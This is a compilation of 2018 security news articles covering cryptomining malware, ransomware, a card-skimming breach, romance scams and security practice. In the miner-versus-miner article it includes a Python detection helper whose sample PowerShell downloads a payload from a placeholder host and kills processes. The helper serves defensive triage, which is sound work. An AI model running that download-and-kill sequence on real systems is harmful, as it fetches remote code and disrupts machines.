STE WILLIAMS

Have password attacks quadrupled, or are we just noticing them more? [PODCAST]

Here’s Episode 2 of the Naked Security podcast.

We have two guests for you this week:

  • We speak to Sophos security expert Matt Boddy about password guessing attacks – why do they still work in 2018, and what can we do about it?
  • We interview top SophosLabs researcher Fraser Howard about HTTPS – is it really a security necessity that we should all embrace, or much ado about nothing?

If you enjoy the podcast, please share it with other people interested in security and privacy and give us a vote on iTunes and other podcasting directories.

Intro music: http://www.purple-planet.com

Closing music: https://thespacelords1.bandcamp.com

Listen and rate via iTunes...
Sophos podcasts on Soundcloud...
RSS feed of Sophos podcasts...


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cDf-M8MrPNQ/

CryptoLurker hacker crew skulk about like cyberspies, earn $$$

A sophisticated mystery hacker group is using tactics more familiar to the world of cyber espionage to earn millions through mining malware.

Kaspersky Lab researchers report that cybercrooks have begun using infection methods and techniques borrowed from targeted attacks in order to install mining software.

The most successful such group earned at least £5m by exploiting their victims in the space of just six months last year, according to the security software firm’s estimates.


The group is using advanced persistent threat-style (APT) techniques and tools to infect users’ devices with miners. They have been using the process-hollowing method usually seen in malware and in some targeted attacks by APT actors, which had never been observed in mining attacks before.

Prospective victims are lured into downloading and installing software containing a hidden miner. The installer drops a legitimate Windows utility at the same time it covertly installs crypto-mining malware.

After execution, a legitimate system process starts but the code of this process quickly turns malicious. As a result, the miner operates under the guise of a legitimate task, making it far less likely that victims will realise that anything is amiss. Even security software packages might be thrown off the scent by this tactic, according to researchers.

Figure: Infection chain of sophisticated mining malware (graphic from the Kaspersky Lab blog post)

Figure: Process hollowing example (graphic from the Kaspersky Lab blog post)

If the user tries to stop the process, the computer system reboots. This combination of tactics makes it more likely that mining malware will stay on infected systems longer, increasing the money-making potential for crooks.

The hacking group behind these tactics has been mining Electroneum coins and earned almost £5m during the second half of 2017, comparable to the sums that ransomware creators used to earn.

Rise up, miners

From September 2017, Kaspersky Lab recorded a rise of miners that begins to eclipse ransomware as a cybercrime racket. Unlike ransomware, cryptojacking doesn’t destructively harm users’ kit and is able to stay undetected for a long time by silently using the PC’s CPU and GPU power.

The growing availability of miner builders, open miner pools and partner programs is making it easy for unskilled would-be crooks to get a slice of the action from the growing miner menace. The most popular miner tool used by threat actors is Nanopool, Kaspersky Lab reports.

“We see that ransomware is fading into the background, instead giving way to miners,” said Anton Ivanov, lead malware analyst at Kaspersky Lab. “This is confirmed by our statistics, which show a steady growth of miners throughout the year, as well as by the fact that cybercriminal groups are actively developing their methods and have already started to use more sophisticated techniques to spread mining software.

“We have already seen such an evolution – ransomware hackers were using the same tricks when they were on the rise.”

Overall, 2.7 million users were attacked by malicious miners in 2017, according to Kaspersky Lab data. This represents a year-on-year growth of 50 per cent compared to 2016, when 1.87 million attacks on users were logged by the firm.

Adware, cracked games and pirated software have all been used by cybercriminals to secretly infect PCs with crypto-mining malware. Web mining through a special code located in an infected web page is also growing in prevalence. The most widely used web miner was CoinHive, discovered on many popular websites. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/03/06/apt_cryptomining/

Second Ransomware Round Hits Colorado DOT

A variant of SamSam sends CDOT employees back to pen and paper with two attack waves in two weeks.

Getting hit by ransomware is expensive and embarrassing. Getting hit twice in a two-week period makes it much worse. That’s the situation in which the Colorado Department of Transportation (CDOT) finds itself after a second wave of SamSam ransomware hit while the department was still in the process of cleaning up from the first attack.

In the first attack, over 2,000 computers running Windows and McAfee security software were taken offline after their files were encrypted. Approximately 20% of those systems had been brought back into service when a variation of the original ransomware struck in a second wave of attacks. All affected computers were once again taken offline as employees of the department reverted to pen and paper to complete routine tasks.

In an interview with the Denver Post, Brandi Simmons, a spokeswoman for the state’s Office of Information Technology said, “The variant of SamSam ransomware just keeps changing. The tools we have in place didn’t work. It’s ahead of our tools.”

Dozens of staff members from Colorado’s Office of Information Technology, the Colorado National Guard, and the FBI are working to get the systems back online. There is no current timeline for having all systems restored to service.

Read more here and here.


Article source: https://www.darkreading.com/attacks-breaches/second-ransomware-round-hits-colorado-dot/d/d-id/1331197?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Connected Cars Pose New Security Challenges

The auto industry should seize the opportunity and get in front of this issue.

Very few objects are as personal to their owners as their cars. But today’s cars have grown beyond a form of self-expression and turned into our personal concierges, navigating the best routes, making our dinner reservations, and potentially reserving parking spots ahead of our arrival. But with all the advantages connected vehicles can bring to our lives, they can also potentially expose us to security risks.

Security risks for networked computers are nothing new, but connected cars present new challenges precisely because, although cars have long been largely computerized, they weren’t networked. Many parts of cars — like the accelerator pedal or the turn signal — are designed to feel mechanical despite being run by tiny microprocessors that are connected through a network within the vehicle. Even so, vehicle software security hasn’t really been a concern because cars have always been isolated and self-contained entities. Now that they connect to the Internet, they expose a new attack surface. How can we secure these connected vehicles that are now accessing our networks?

It’s too early to tell how vehicle connectivity may impact an enterprise and it may seem absurd to think about a car as an enterprise network endpoint, but some luxury vehicle brands already have office productivity tools in-dash. Using the car as a workstation will only increase in popularity as autonomous driving replaces manual driving. In addition to the in-dash email, cars are also providing Wi-Fi hotspots and interfaces like Apple iOS CarPlay and Google Android Auto, which make our cars look and act more like our phones, raising the same kinds of concerns that are present with mobile devices in personal life and for the enterprise.

Autonomous driving isn’t limited to making knowledge workers’ windshield time more productive. Logistics companies, for example, will benefit tremendously from autonomous vehicles, but imagine an attacker compromising and shutting down those vehicles: the results would be disastrous not only to the logistics company but to all of the businesses that rely on them as a vendor. The same could be true for any business that relies heavily on connected vehicles.

Cautionary Tales
There are already cautionary tales about networked vehicles from other industries. Airlines, for example, were surprised when a security researcher claimed to have used an in-flight entertainment system to access the flight-control computers and modify a plane’s behavior. This was possible because there was insufficient segmentation between the networks supporting the critical functions and the networks supporting ancillary services. While accounts differ about the nature and severity of the incident, it’s clear that ubiquitous and unrestricted connectivity creates unintended risk.

Of course, conducting such an attack requires the attacker to be on the plane. But that wouldn’t necessarily be the case if there was an Internet connection available. To improve vehicle security, we must segment out the subsystems, separating entertainment and concierge services from the systems responsible for vehicle operation. This will ensure that neither is a gateway to the others and they don’t interact or affect one another. As intravehicle networks evolve and mature, even more segmentation may become desirable, but minimally it is necessary for two segments: one for systems and communications critical to the function of the vehicle, and one for “everything else.”

The telecom industry — with its stringent requirements for uptime and wide variety of services — has done a relatively good job of designing networks that separate critical operations from noncritical ones, as well building in resilience and mechanisms that prevent network abuse. The automotive industry could borrow these segmented network security concepts for use in their own factories in which the cars are built, for example the mission-critical machines and the computers that operate them reside on one protected network, while systems supporting less important front-office functions, such as email and file servers, reside on separate networks.

It’s unclear whether the automotive industry acknowledges this as a problem. If one out of 20 million produced cars malfunctions, that is statistically insignificant and may not be enough to drive major change. Ideally, auto companies would take their own initiative, benefiting from models established by organizations like state Bar Associations or The American Medical Association which prescribe requirements and standards of behavior for their membership. They could even create an industry-specific standards framework as the payment card industry did with the PCI Data Security Standard.

Ultimately, auto companies should treat this as a product safety feature in much the way that they do with seatbelts, air bags, and all the mechanical components of their product; they must ensure that they have clearly defined preventative and remedial maintenance procedures for the useful lifespan of their products.

While we are still a way off from hackers redirecting vehicles, or entering an enterprise network through a connected car, the technology is evolving and the infrastructure is forming to make these concerns a reality in the coming years. By taking cues from other industries that have navigated these channels, the auto industry has an opportunity to get ahead of the demand for security that is sure to come with innovation.


James Plouffe is a Lead Architect with MobileIron and a Technical Consultant for the hit series Mr. Robot. In his role as a member of the MobileIron Product and Ecosystem team, he is responsible for driving integrations with new technology partners, enhancing existing …

Article source: https://www.darkreading.com/endpoint/connected-cars-pose-new-security-challenges/a/d-id/1331166?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Games site customers offered $5 voucher after credit card breach

Games developer Nippon Ichi Software (NIS) has admitted that customers of two of its US online stores are at risk of credit card fraud after they were hacked.

Like something out of our What you sound like after a data breach article, it’s offering customers a $5 (£3.60) online voucher with no promise of credit checking beyond what the US Government already offers for free.

In social media posts and an email sent on 1 March, NIS said that the breach affecting nisamerica and snkonlinestore happened on 23 January and continued until it was discovered on 26 February.

During that period:

Your personal information, including your payment information, may have been compromised.

Which, when you read further into the alert email, turns out to be an understatement.

After entering their billing, shipping, and payment information, the customer would be temporarily redirected to an offsite web page not owned or operated by NIS America, Inc.

This “malicious process” grabbed everything entered by customers, including billing and shipping address, and credit card data (including the CVV number), before returning customers to the NIS America page to complete the transaction none the wiser. Only PayPal customers were not affected.

NIS said it has taken steps to close the vulnerability that led to the breach, which leaves us guessing as to exactly what that vulnerability might have been.

On Twitter, security researcher Kevin Beaumont claimed he’d been told that the weakness was a writable Amazon AWS S3 bucket, which hosted a JavaScript redirection to a third-party server.

NIS hasn’t confirmed this detail of the breach, so it remains informed, if unconfirmed, speculation.

For now, the company’s biggest problem seems to be customer anger, not only at the severity of the breach but an offer to compensate victims by applying the $5 discount against future purchases. Said NIS:

We understand that this is a small token, but we hope it will show our commitment and appreciation of our customers as we begin to regain your trust.

After posting what was claimed to be a sequence of fraudulent card transactions running to $1,000, one Twitter user responded:

The five dollars will really help here.

NIS offered customers a link to the Federal Trade Commission’s identity theft service, which offers US citizens affected by data breaches a free 90-day fraud alert via one of several credit reference agencies.

A standard response in data breaches – especially ones that involve live credit card data – would be at least a year of credit checking and lock, as was the case for affected users after September’s massive Equifax breach.

This could be a test case for US regulators. NIS is no Equifax, but smaller breaches should not be ignored simply because they are smaller.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wTvFA-AbS5s/

“Big Bitcoin Heist” sees 600 Icelandic servers stolen

Ahhh, Iceland. Perched on the edge of the Arctic Circle, it’s got plentiful data center capacity, renewable energy galore from geothermal and hydroelectric power plants, and that reliably chilly climate to help with cooling.

No wonder cryptocurrency miners have been flooding into the island in recent months.

Of course, where miners go, thieves are sure to follow. Sure enough, Iceland now brings us yet another thievery method to add to the growing list of cryptocoin burglary techniques: this time “grabbing the actual servers”.

In what Icelandic media have dubbed the “Big Bitcoin Heist,” 600 servers have been spirited out of data centers in four burglaries. Three heists happened in December and a fourth took place in January. According to AP, authorities have kept it on the hush-hush while they’ve worked on tracking down the culprits.

Investigators haven’t found the servers yet. They’re worth nearly $2 million, AP reports. As The Register notes, it’s not surprising that the hardware has proved to be elusive: servers used to mine bitcoins are pretty generic. They could easily have been stripped for parts – be they the currently scarce GPUs, the RAM or the fast solid-state disks – and shipped piecemeal for sale anywhere.

Icelandic police haven’t come up completely empty-handed, however: they’ve arrested 11 people so far, including a security guard. A judge at the Reykjanes District Court on Friday ordered two people to remain in custody.

AP quoted Olafur Helgi Kjartansson, the police commissioner on the southwestern Reykjanes peninsula, where two of the raids took place:

This is a grand theft on a scale unseen before. Everything points to this being a highly organized crime.

Police are keeping an eye out for unusually spiked energy usage across the country that could lead them to the servers, according to an industry source who spoke with AP under condition of anonymity.

Icelandic authorities have called on local internet service providers (ISPs), electricians and storage space units to report any unusual requests for power.

Of course, if the servers have been carved up and shipped out, that could well turn out to be a dead end.

At any rate, back to the newly lengthened list of ways to rip off people in these frenzied days of seeking fast cryptocoin riches. Now, we can add hardware kidnapping to that list. It will appear alongside exit scams, mining malware, mining malware cum ransomware, kidnapping, your common-or-garden variety hacking, and IRL robbers with IRL guns.

It’s a dangerous place, this brave new world of cranking out virtual currency. Does it scare you off?

No shame in that. The ranks of a-pox-on-this-stuff investors are swelling right along with the ways to rip it off. Bill Gates last week threw his hat into the ring with other cryptocoin naysayers, saying that virtual currencies are killing people in a “fairly direct way” because of how they’re used to fund terrorism and to buy fentanyl and other dangerous drugs.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/iBDg-wcg3PI/

“Prince Charming” is a happily married, gay, identity theft victim

Well, ooo-la-la, “Martin,” you silver-haired fox, I just love your dating profile photos. I’m so sorry for the recent loss of your dog – what a cutie! But I’m super touched by the one where you’re doing something or other with pastries and jam, for a charity – awwww!

You’re just the man for me – you hot, sensitive, caring thing. You’re mature, plus that photo of you in the swimming pool in Mykonos shows you’ve stayed in shape since your wife died, and… wait one minute!

What’s that you say? You’re happily married? …And gay??!!

Oh, dear. *Poof!* go my dreams and those of at least three women who saw “Martin’s” photos on dating sites and social media platforms… actually, let’s make that 58-year-old Danish-American widower “Martin” on the Zoosk dating site, divorced Danish-American “Christian” on EliteSingles, and 50-year-old divorcé “Sebastian” on Facebook.

It turns out that the photos are actually of Steve Bustin, 46, currently happily married to his husband. They live in Brighton in the UK. Scammers have been using his photos to woo women since 2016.

Over the weekend, Bustin got so sick of being contacted by confused women that he decided to devalue the photos by telling The Times that he’s never visited a dating site and that he’s not going to be making some heterosexual woman’s dreams come true, given his aforementioned husband.

These are some of the captions the scammers slapped on the ripped-off photos:

The dog was mine but he passed last year.

The one with my face painted was Halloween.

The one with the pastries and jam was to raise funds for charity.

The one with me and just the woman is my late wife.

Lies, lies, despicable lies. Bustin told the Times that the romance scammers had used his likenesses to “construct a profile of my whole life”:

Someone has been harvesting images of me from all over the web.

The photos go back as far as 2012, to the photo of Bustin in a pool while he was on holiday in Mykonos, Greece. The most recent photo is from a Halloween party in autumn 2017.

A scammer going under the name Martin Peterson was using those photos, trying to pull the wool over the eyes of a 60-year-old widow. She allowed The Times to print her photo but not her name.

She told the publication that the scammer first contacted her on 29 January. He/she was using photos stolen from a social media site. The woman grew suspicious a few days later, when “Martin” claimed to be on holiday in Dubai and sent her photos supposedly of him having breakfast, then in the swimming pool. Funny thing, she noticed: his hair went from salt and pepper to silver, and the photos made it look like he’d gotten chubbier.

What followed was more song and dance: a purported passport photo, a video of Bustin on a Skype call (with the scammer’s voice superimposed) for a “live” conversation, an invitation to move into his home in north London barely two weeks after their initial phone conversation.

It was that invitation that led the woman to do a bit of forensics – she did a reverse image search. That’s what led her to Bustin: a former BBC News producer who now works as a speaker and as a speech and media trainer. The Times quoted her:

I thought I’d found my Prince Charming. I was really taken in. He used to seem so kind. He’d send me music and say: ‘Do you like the song? Do you like dancing?’ I feel a total idiot.

For Bustin, it was an “Oh no, here we go again” situation. In July 2016, Birgit Hebibi, 54, who lives in Berlin, had contacted Bustin to let him know that she too had been snookered by a scammer using his identity. Hebibi told The Sunday Times that she’d been contacted by “Sebastian,” who claimed to be British and working in Thailand. Smart cookie: she broke it off when he started asking her for money.

Then, a year ago, he heard from a woman who went by the name Isobel on dating sites. She told Bustin that “Christian Hansen” had wooed her on EliteSingles, again hiding behind his photos. She took it up with the site, which apologized, admitting:

It does appear that this individual was able to slip under the radar.

Bustin said he’s been increasing the privacy settings on his social media posts, but hey, he’s a public figure: he’s got to put himself out there with an active public profile.

How to vet Prince Charming

Nobody should be embarrassed by falling for one of these scammers. They know what we want to hear, and they know how to sound sincere – to the point that they can convince their targets to ignore the warnings of family and friends who smell a rat. Like, say, the 79-year-old accountant who fell for a Nigerian email scammer so hard that he bilked a friend out of £151,000 ($184,000) to come to the rescue of a “girlfriend” he’d never actually met. Even at trial, he still staunchly believed all the romantic bilge “she” pumped out.

We’ve got to keep in mind that embarrassment and financial fraud aren’t the only things that can happen to us if we fall for these come-ons. In October 2016, the accountant was found guilty of fraud by misrepresentation – for deceiving his bilked friend by lying about his “relationship” with the scammer – and was sentenced to 18 months in jail.

Then there was the woman who got dragged into an Argentinian prison for 2.5 years, for unwittingly attempting to smuggle cocaine sewn into the lining of a suitcase at her “lover’s” request.

The FBI has a term for these liar-bags: sweetheart swindlers. These are the warning signs the FBI says we should keep an eye out for to spot somebody who’s trying to con us, our family or our friends:

  • Presses you to leave the dating website you met through and to communicate using personal email or instant messaging.
  • Professes instant feelings of love.
  • Claims to be local but is purportedly traveling or working overseas.
  • Makes plans to visit you but is then unable to do so because of a tragic event.
  • Asks for money for a variety of reasons (travel, medical emergencies, hotel bills, hospital bills for child or other relative, etc).

If you, or the intended victim, still aren’t convinced, a powerful tool is the one used by the 60-year-old widow to find out who “Martin” really was: run a reverse image lookup search to see where else Prince Charming or Princess Distressed and Broke Maiden has been hanging out online.

It’s free, and it’s instructive: you could well find the photo a fake friend has used, perhaps even posted on sites devoted to exposing the fraudsters who use the same images over and over – typically, stolen images.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/mb6uExAnDR8/

Miner vs miner: Attack script seeks out and destroys competing currency crafters

Cryptocurrency-mining malware-scum have started to write code that evicts rivals from compromised computers.

The miner in question was first noticed by SANS Internet Storm Center handler Xavier Mertens. Mertens spotted the PowerShell script on March 4, and noting that it kills any other CPU-greedy processes it spots on target machines, he wrote: “The fight for CPU cycles started!”

Pre-infection, the attack script checks whether a target machine is 32-bit or 64-bit and downloads files known to VirusTotal as hpdriver.exe or hpw64 (they’re pretending to be HP drivers of some kind).

If successfully installed, the attack then lists running processes and kills any it doesn’t like. Mertens noted that alongside ordinary Windows stuff, the list of death-marked processes includes many associated with cryptominers, some of which are listed below.

  • Silence
  • Carbon
  • xmrig32
  • nscpucnminer64
  • cpuminer
  • xmr86
  • xmrig
  • xmr

Mertens wrote that the script also checks for processes associated with security tools.
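As an added illustration for defenders (this is not Mertens’ script nor any code from the article), a small Python triage helper that pulls the kill list out of a captured PowerShell sample and flags it when the targets overlap with the miner process names quoted above. The embedded sample script, the placeholder URL and the architecture-check indicators are constructed assumptions, not the real malware.

```python
import re
from typing import Dict, List, Set

# Process names the article reports on the script's kill list.
KNOWN_MINER_PROCESSES: Set[str] = {
    "silence", "carbon", "xmrig32", "nscpucnminer64",
    "cpuminer", "xmr86", "xmrig", "xmr",
}

# Constructed sample imitating the behaviour described in the article
# (32/64-bit check, lookalike "HP driver" payload names, process kill list).
# Not the real script; the URL is a placeholder.
SAMPLE_SCRIPT = r"""
if ([IntPtr]::Size -eq 8) { $p = "hpw64" } else { $p = "hpdriver.exe" }
Invoke-WebRequest -Uri "http://PLACEHOLDER.invalid/$p" -OutFile "$env:TEMP\$p"
Stop-Process -Name xmrig -Force
Stop-Process -Name "cpuminer" -Force
taskkill /F /IM xmr86.exe
taskkill /F /IM nscpucnminer64.exe
Stop-Process -Name notepad -Force
"""

# Two common ways a PowerShell script terminates a process by name.
STOP_PROCESS_RE = re.compile(r'Stop-Process\s+-Name\s+"?([\w.\-]+)"?', re.IGNORECASE)
TASKKILL_RE = re.compile(r'taskkill\b[^\n]*?/IM\s+"?([\w.\-]+)"?', re.IGNORECASE)

# Assumed indicators of an architecture check (PowerShell idioms, not from the article).
ARCH_CHECK_RE = re.compile(
    r"\[IntPtr\]::Size|PROCESSOR_ARCHITECTURE|Is64BitOperatingSystem", re.IGNORECASE
)

# Lookalike payload names quoted in the article.
LOOKALIKE_PAYLOADS = ("hpdriver.exe", "hpw64")


def normalize(name: str) -> str:
    """Lower-case a process name and drop a trailing .exe so 'XMRig.EXE' matches 'xmrig'."""
    name = name.lower()
    return name[:-4] if name.endswith(".exe") else name


def extract_kill_targets(script: str) -> List[str]:
    """Return the deduplicated, normalized process names the script tries to terminate."""
    found: List[str] = []
    for regex in (STOP_PROCESS_RE, TASKKILL_RE):
        found.extend(normalize(m) for m in regex.findall(script))
    return list(dict.fromkeys(found))  # dedupe while keeping first-seen order


def assess_script(script: str) -> Dict[str, object]:
    """Score a PowerShell sample for 'miner vs miner' behaviour.

    A sample is flagged when it kills two or more known miner processes, or kills
    one and also shows an architecture check or a lookalike payload name.
    """
    targets = extract_kill_targets(script)
    miner_hits = sorted(t for t in targets if t in KNOWN_MINER_PROCESSES)
    arch_check = bool(ARCH_CHECK_RE.search(script))
    lookalikes = sorted(n for n in LOOKALIKE_PAYLOADS if n in script.lower())
    suspicious = bool(
        len(miner_hits) >= 2 or (miner_hits and (arch_check or lookalikes))
    )
    return {
        "kill_targets": targets,
        "miner_kill_targets": miner_hits,
        "arch_check": arch_check,
        "lookalike_payloads": lookalikes,
        "suspicious": suspicious,
    }


if __name__ == "__main__":
    for key, value in assess_script(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```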

Mertens’ next post is also worth a look if you’re a Linux admin. He followed up on this tweet from ESET’s Michal Malik.

It’s a bash script that tries to push a miner onto Linux boxes, along with scanning the Internet for Windows machines vulnerable to the NSA’s EternalBlue attack. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/03/06/cryptocurrency_miner_sans_martens/

Co-op Bank’s shonky IT in spotlight as delayed probe given go-ahead

An inquiry into The Co-operative Bank’s financial collapse is to open four years after it was first announced by former UK chancellor George Osborne.

The Treasury today directed the financial regulator, the Prudential Regulation Authority (PRA), to conduct a review into how the bank was regulated between 2008 and 2013, before a £1.5bn capital hole emerged in its books as a result of bad loans.

Separately, Britain’s Financial Conduct Authority (FCA) has also today banned the bank’s disgraced former chairman, Paul “Crystal Methodist” Flowers, from ever holding another financial services position.

The inquiry will look at the impact of IT on its operations, specifically whether the regulator was made aware by Co-op Bank of the change in the accounting treatment of the cost of replacing its IT platform in 2010, and, if it was, whether it should “have acted to postpone the effect of the IT programme on the Co-op Bank’s capital position”.

Following its collapse in 2013, part of the turnaround efforts for Co-op included throwing £500m at overhauling its creaking IT infrastructure after years of “under-investment”.

In 2015 the FCA and PRA said they were closely supervising the firm as it worked towards restoring its technology compliance.

The FCA informed Co-op that its technology issues constitute a breach of its Threshold Conditions, which include an outline of the minimum standards for technology. That issue centred around its lack of a proven end-to-end disaster recovery capability.

Nicky Morgan, chair of the Treasury Select Committee, wrote to FCA chief exec Andrew Bailey last week asking for a “full explanation” for the delay.

In a statement, she said: “The launch of the independent inquiry into Co-op Bank – more than four years after it was announced – is welcome; but it is hugely overdue.

“Although much has changed since the events in question, a forensic examination of the circumstances of Co-op Bank’s failure will no doubt yield important lessons for the financial regulators.”

Mark Zelmer, previously a senior official at the Bank of Canada and the International Monetary Fund (IMF), will lead the investigation. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/03/06/delayed_probe_into_failure_of_coop_bank_finally_launched/

Pragmatic Security: 20 Signs You Are ‘Boiling the Ocean’

Ocean-boiling is responsible for most of the draconian, nonproductive security policies I’ve witnessed over the course of my career. Here’s why they don’t work.

I’ve always been a fan of the rather descriptive expression “boil the ocean.” According to Investopedia, boiling the ocean is to undertake an impossible task or project, or to make a task or project unnecessarily difficult. More concisely, boiling the ocean generally means “to go overboard.”

In security, we can learn a valuable lesson from this expression. Security is all about balance and pragmatism. Enumerating risks and threats to the organization while simultaneously prioritizing them. Seeking to mitigate risk while in parallel understanding the need to accept a certain amount of it. Building a security program even though some of the people, process, and technology involved may be missing or imperfect. Running security operations with an understanding that the conditions are never ideal. Balancing between business or operational needs and security principles. And so on…

In my experience, boiling the ocean does not allow an organization to improve its security posture. In fact, quite the opposite is true. So how can organizations turn away from ocean-boiling and toward a more pragmatic approach to security? I present “20 signs you are trying to boil the ocean.”

Image Credit: DuMont Television/Rosen Studios. Public domain, via Wikimedia Commons.

1. Perfect is the enemy of good. I’m a big fan of the Pareto principle. Sometimes it is possible to roll out a solution that addresses most of what we need fairly quickly, even if it doesn’t address everything. If we wait for that perfect solution, we might be waiting a long time.
2. Finding the problem in every solution. I’ve worked with some pretty impressive people over the course of my career who seem able to find a solution to nearly every problem they face. I’ve also worked with people who seem to find the problem in every solution they discover. The former helps organizations mature. The latter makes them spin their wheels endlessly.
3. Working in series rather than in parallel. Ever feel like you can’t move forward on tasks B, C, and D until task A is completed? That may be the case in some instances. But in many cases, there isn’t as much interdependence between tasks as you think. It is very often quite possible to work in parallel to move things forward.
4. Inability to find the path forward. If trying to move any effort forward seems like an endless series of dead ends, it could be a sign that a less complicated path may bring better results.
5. Paralysis. Organizational paralysis can be, well, paralyzing. If employees don’t try and effect change because they feel that it is doomed to failure, it could be another sign of rampant ocean boiling.
6. Playing hot potato. When the answer is unknown, it’s easy to just say no and pass the hot potato on to the next person. Putting aside ocean boiling allows organizations to identify what can be done, instead of what cannot be done.
7. Always looking for more data points. It’s easy to put off a decision because you are waiting for more data points. At some point, you need to realize that you have just about all of the relevant data points you will ever have and make a decision.
8. Always waiting for something else to happen. In a similar manner, it’s easy to put off a decision because you are waiting for something else to be completed. Sometimes there is a genuine need for this type of dependence, but often, it’s another symptom of ocean boiling.
9. Looking for every out. Ever come across people who seem like they are just looking for every possible out or opportunity to dismiss an idea? No idea is perfect, but many ideas can develop into real-life solutions.
10. Waiting for more money. There will never be enough budget to do everything that needs doing. Prioritize and get moving.
11. Waiting for more time. See number 10.
12. Looking for the perfect hire. Everyone wants to hire a 20-year-old analyst with 10 years of experience. I’d also like to have a pet unicorn, but we can’t always have what we want. Consider hiring bright, energetic, motivated, and analytical people and training them.
13. Drowning in false positives. Well, if I turn off my noisiest alerts, then I might miss something, so I’ll just do nothing instead. Sound familiar? News flash: if you are drowning in false positives, you are missing something already. Figure out how to be alerted to more of the stuff you care about and less of the stuff you don’t.
14. Stagnant on content development. Attacker techniques continually evolve. You will never arrive at the perfect signature, logic, or algorithm. Know when you have something good enough that gives you a good shot at identifying attacker activity without drowning you in false positives.
15. Processes and procedures are forever a work in progress. There will always be more that can be documented or documented better. But at some point, your team needs guidance and a path forward for a variety of different situations.
16. Inability to start a dialogue with executives. You will never be prepared enough for all the potential questions and points that executives might raise. But you need to be able to get enough of a story together to be able to discuss risk prioritization with executives and move your team’s agenda forward.
17. Inability to make progress with the business. Security shouldn’t be the team of no, nor should it inhibit the business. On the other hand, risk to the business needs to be managed properly and minimized wherever possible. These may sound like contradictory points, but a pragmatic, collaborative approach to the business can help all parties converge on a workable solution.
18. Operations permanently stuck in ramp-up. I’ve seen lots of situations where security teams seem to ramp up for years on end. At some point, security operations must start, even if imperfect. A security program can always be improved iteratively once it is running day-to-day. That’s much better than never getting anything off of the ground.
19. Inability to prioritize risk. Every risk seems like a top priority. But if we have limited resources, we have to make calculated choices. Otherwise, we spin our wheels forever.
20. Draconian policies. Ocean boiling is responsible for most of the draconian security policies I’ve seen over the course of my career. It helps to understand which policies and practices actually contribute to improving security, and which ones just make ocean boilers feel better.


Josh (Twitter: @ananalytical) is an experienced information security leader with broad experience building and running Security Operations Centers (SOCs). Josh is currently co-founder and chief product officer at IDRRA and also serves as security advisor to ExtraHop. Prior to …

Article source: https://www.darkreading.com/threat-intelligence/pragmatic-security-20-signs-you-are-boiling-the-ocean/a/d-id/1331178?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple